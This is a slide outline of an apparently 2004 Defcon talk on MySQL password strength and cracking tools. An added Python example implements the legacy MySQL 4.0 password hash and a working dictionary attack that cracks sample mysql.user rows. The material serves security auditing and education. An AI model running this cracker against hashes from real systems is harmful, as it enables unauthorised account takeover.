Slide 1: MySQL Passwords: Password Strength and "Cracking"
Presented by Devin Egan, Defcon 12, July 31, 2004
Slide 2: Introduction
- Who am I?
- Goals: MySQL password education; introduce MySQL password "cracking"
Slide 3: What Will This Talk Cover?
- Covered: MySQL password "cracking"
- NOT covered: how to obtain a MySQL hash
Slide 4: Passwords: Best Practices
- Absolute minimum of 9 characters
- Mixed case and mixed special characters
Slide 5: Why Crack MySQL Passwords?
- Security audits
- Recovery of a lost password
Slide 6: Tools for Cracking Passwords: existing tool "mysqlfast"
- Very effective and fast brute-force cracker
- Limited: 8 characters max
- Works only on the 16-hex-digit hash format of MySQL 4.0 and earlier (not the 41-character format introduced in 4.1)
- Single hash at a time
Slide 7: Tools for Cracking Passwords: existing tool "John the Ripper" (contrib patch)
- Dictionary-based cracker
- Trusted by most security professionals
- Limited: works only on the MySQL 4.0-and-earlier hash format
- Can be SLOW
Slide 8: Tools for Cracking Passwords: new tool "phpMyAudit"
- Dictionary-based
- Runs from the web or from a shell script
- Extremely fast (after a one-time dictionary import)
- Can find passwords that "mysqlfast" cannot brute force (dictionary words are not bound by its 8-character limit)
- Limited: not always as effective as "mysqlfast" or "John" (a password that is not in the dictionary is never found)
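Slides 6 to 8 compare three tools but never show the hash they all attack. The following is an added example, written for this page and not code from the talk or from mysqlfast, John the Ripper or phpMyAudit: a Python reimplementation of the 16-hex-digit hash that MySQL 4.0 and earlier used (exposed as OLD_PASSWORD() in later releases), plus the two audit steps the slides describe, a one-time "dictionary import" into a hash-keyed lookup table and a check that refuses the 4.1+ format the 4.0-era tools cannot handle. The function names, the mangle rules, the word list and the mysql.user-style sample rows are this example's own constructions; the only real-world value is the root hash, which is the result the MySQL 4.0 manual gives for PASSWORD('badpwd').

```python
"""Dictionary attack against the pre-4.1 MySQL password hash (added example).

All sample data below is constructed for illustration; nothing here is taken
from the talk's tools.
"""
import hashlib
import string
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def mysql_old_password(password: str) -> str:
    """The 16-hex-digit hash used by MySQL 4.0 and earlier (OLD_PASSWORD() in 4.1+).

    Two 32-bit registers are mixed with each byte of the password; spaces and
    tabs are skipped, so 'badpwd' and 'bad pwd' hash identically. The result is
    both registers with their top bit cleared, printed as 8 + 8 lowercase hex digits.
    """
    nr, nr2, add = 1345345333, 0x12345671, 7
    for byte in password.encode("latin-1"):
        if byte in (0x20, 0x09):  # the original skips ' ' and '\t'
            continue
        nr = (nr ^ (((nr & 63) + add) * byte + (nr << 8))) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += byte
    return f"{nr & 0x7FFFFFFF:08x}{nr2 & 0x7FFFFFFF:08x}"


def mysql_new_password(password: str) -> str:
    """The 41-character hash introduced in MySQL 4.1: '*' + hex(SHA1(SHA1(pw)))."""
    inner = hashlib.sha1(password.encode("latin-1")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def hash_format(h: str) -> str:
    """Classify a hash so a 4.0-only cracker does not waste time on 4.1 hashes."""
    h = h.strip()
    if len(h) == 16 and all(c in string.hexdigits for c in h):
        return "mysql-old"
    if len(h) == 41 and h[0] == "*" and all(c in string.hexdigits for c in h[1:]):
        return "mysql-4.1"
    return "unknown"


def mangle(word: str) -> Iterable[str]:
    """Cheap rule-based variants of a dictionary word (capitalisation, common suffixes).

    The rule set is this example's own choice, not a rule from any of the tools.
    """
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "2004"):
            yield base + suffix


def build_lookup(wordlist: Iterable[str]) -> Dict[str, str]:
    """One-time 'dictionary import': hash every candidate once, keyed by its hash.

    Lookups are then O(1) per target hash, so auditing a whole mysql.user table
    costs about the same as auditing one account.
    """
    table: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word):
            table.setdefault(mysql_old_password(candidate), candidate)
    return table


def crack_user_table(rows: List[Tuple[str, str, str]],
                     wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Audit (user, host, password_hash) rows; None means not found or unsupported format."""
    table = build_lookup(wordlist)
    found: Dict[str, Optional[str]] = {}
    for user, _host, h in rows:
        h = h.strip()
        if hash_format(h) == "mysql-old":
            found[user] = table.get(h.lower())
        else:
            found[user] = None  # 4.1+ or unrecognised: outside this cracker's scope
    return found


# Constructed sample data. 'root' carries the hash the MySQL 4.0 manual lists for
# PASSWORD('badpwd'); the other rows are generated here for illustration.
WORDLIST = ["password", "badpwd", "mysql", "letmein", "admin"]
SAMPLE_USER_TABLE = [
    ("root", "localhost", "7f84554057dd964b"),
    ("app", "%", mysql_old_password("Mysql2004")),             # reachable via mangle()
    ("backup", "10.0.0.5", mysql_old_password("Tr0ub4dor&3")),  # not in the list
    ("legacy41", "localhost", mysql_new_password("letmein")),   # 4.1 format, skipped
]

if __name__ == "__main__":
    for user, pw in crack_user_table(SAMPLE_USER_TABLE, WORDLIST).items():
        print(f"{user:10} {pw if pw is not None else '<not found / unsupported format>'}")
```

Running the module recovers root and app, leaves backup unfound because its password is in no candidate list, and skips legacy41 because the hash is the 4.1 format. That is the trade-off the slides describe: the precomputed table makes the number of accounts almost irrelevant and has no length ceiling, whereas a brute forcer limited to 8 characters would never reach "Tr0ub4dor&3" either but would find any short password that no dictionary contains. Note also the space and tab skipping in the old algorithm, which means "bad pwd" unlocks an account whose password is "badpwd".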
Slide 9: Demonstration!
Slide 10: Conclusion
- Questions?
- For updates, please check: http://www.php5security.com/projects/phpMyAudit